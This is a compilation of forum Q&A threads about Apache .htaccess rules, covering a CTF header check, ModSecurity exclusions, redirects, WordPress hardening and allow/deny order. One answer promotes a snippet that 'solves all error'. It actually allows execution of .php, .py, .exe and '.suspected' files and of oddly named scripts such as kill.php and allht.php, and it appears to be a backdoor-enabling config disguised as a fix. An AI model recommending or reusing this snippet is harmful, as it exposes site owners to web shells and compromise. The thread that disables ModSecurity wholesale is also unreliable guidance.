I was doing a CTF on HackTheBox and came across an .htaccess rule that is puzzling me:
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Is it valid? And if so, what is it supposed to do? I am most puzzled by the Required-Header at the end of the line.
The above rule is the first in the .htaccess file. For reference, here is the rest of it:
Order Deny,Allow
Deny from All
Allow from env=Required-Header
Related
my payment gateway is blocked by mod_security when trying to access Woocommerce endpoint.
receiving 403 permission denied when trying to access the "/wc-api/my_gateway_payment_callback" endpoint.
im on an Litespeed shared host.
when disabling the mod_security from .htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
it solves the issue but exposes Wordpress admin to attacks, so i want to be more specific.
i tried to add a LocationMatch
<LocationMatch "/wc-api/my_gateway_payment_callback">
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /wc-api/my_gateway_payment_callback/" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
</LocationMatch>
or
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /my_gateway_payment_callback" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
but they dont work and im still getting the 403 error.
I can spot multiple problems here:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Are you really using ModSecurity v1? That is VERY old and suggests you are using Apache 1 as ModSecurity v1 is not compatible with ModSecurity v1. If not this should be:
<IfModule mod_security2.c>
SecRuleEngine Off
</IfModule>
Next you say:
it solves the issue but exposes Wordpress admin to attacks
I don't see how it can solve the issue unless you are on REALLY old software, so suspect this is a red herring.
so i want to be more specific. i tried to add a LocationMatch
Good idea to be more specific. However LocationMatch runs quite late in Apache process - after ModSecurity rules will have run so this will not work. However you don’t really need LocationMatch since your rule already scopes it to that location. So let’s look at the next two pieces:
SecRule REQUEST_URI "#beginsWith /wc-api/my_gateway_payment_callback/" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
SecRuleRemoveById 3000
You shouldn't need to remove the rule if you allow it on the previous lines. Typically you would only do one or the other.
or
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /my_gateway_payment_callback" > \
"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
but they dont work and im still getting the 403 error.
You have pass (which means continue on to the next rule) and allow (which means skip all future rules). It seems to me you only want the latter and not the former. As these are conflicting, I suspect ModSecurity will action the former first hence why it is not working.
However the better way is to look at the Apache error logs to see what rule it's failing on (is it rule 3000 as per your other LocationMatch workaround?) and just disable that one rule rather than disable all rules for that route.
So all in all I'm pretty confused with your question as seems to be a lot of inconsistencies and things that are just wrong in there...
I have one website (www.mysite.com) that I have on a temporary redirect to another folder (www.mysite.com/tempfolder/index.php). I also host another site in the root folder of www.mysite.com called www.subsite.com. It has it's own URL, but I can't figure out how to make that entire sub-folder exempt from the redirect! Any ideas? Here is what my .htaccess file looks like right now (which is perfectly redirecting everything to the temporary landing page).
<Limit GET POST PUT>
order deny,allow
deny from all
allow from ***
allow from ****
allow from *****
</LIMIT>
ErrorDocument 403 http://www.mysite.com.com/tempfolder/index.php
<filesMatch ".(htm|html|php|css|js|php|gif|jpg|db|png)$">
order allow,deny
allow from all
</FilesMatch>
Any ideas? thanks all!
try putting an .htaccess file in the subfolder that does not contain the redirection rules. That should work just fine -- it can even be a blank file.
I keep getting my .htaccess file hacked on my WordPress installation, what can I do to prevent this from happening again?
http://pastebin.com/H54FaA8U
Have a look on security.stackexchange.com's wordpress tag for guidance here, and this question in particular.
change your user name and password add tough password that has number and digit and character caps etc.
remove all the extra templates, One of you template files are infected that is re writing the htaccess file.
Update all the plugins and templates that you are using.
remove all the extra plugins that you no longer use.
it worked for me good luck
Add this htaccess code in your WordPress .htaccess file to Protect .htaccess and wp-config.php file From Unauthorized Access
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
<files wp-config.php>
order allow,deny
deny from all
</files>
I saw several htaccess example disabling some files to access:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
for example, this prevents to access all .JS and .SQL files, the others are enabled. I want the contrary! I want those files to be ENABLED, all others to be prevented. How to achieve this?
Vorapsak's answer is almost correct. It's actually
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
and a bit of explanation:
The order cause tells the server about its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaulated: if a request matches any deny directives, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaulated: if a request matches an allow directive, it's allowed in, even if it matches a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
oh and, one more thing: directives in a section (i.e. < Files> and < Directory>) are always evaulated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as inteded: the main .htaccess denied the request, then the < Files> order was processed, and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
if you are having trouble with your website, use this htaccess code. It solves all error you may likely encounter
DirectoryIndex index.html index.php
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this help you, don't forget to thump up!!!
I was told that this is the right way to redirect anyone who is trying to open:
/users/username/something.txt
But i can't seem to get it work.
RewriteEngine on
RewriteRule \.txt$ /notallowed.html [F,L,NC]
Is this wrong?
The simplest way to deny users from all TXT files would be to use something like:
<FilesMatch "\.(txt)$">
Order Allow,Deny
Deny from all
</FilesMatch>
However, the code you have there should work for all intents and purposes. Depending on your server configuration, however, you may need to add "Options +FollowSymLinks".
If you decide to go the FilesMatch route, you can use ErrorDocument to control what page the user is taken to.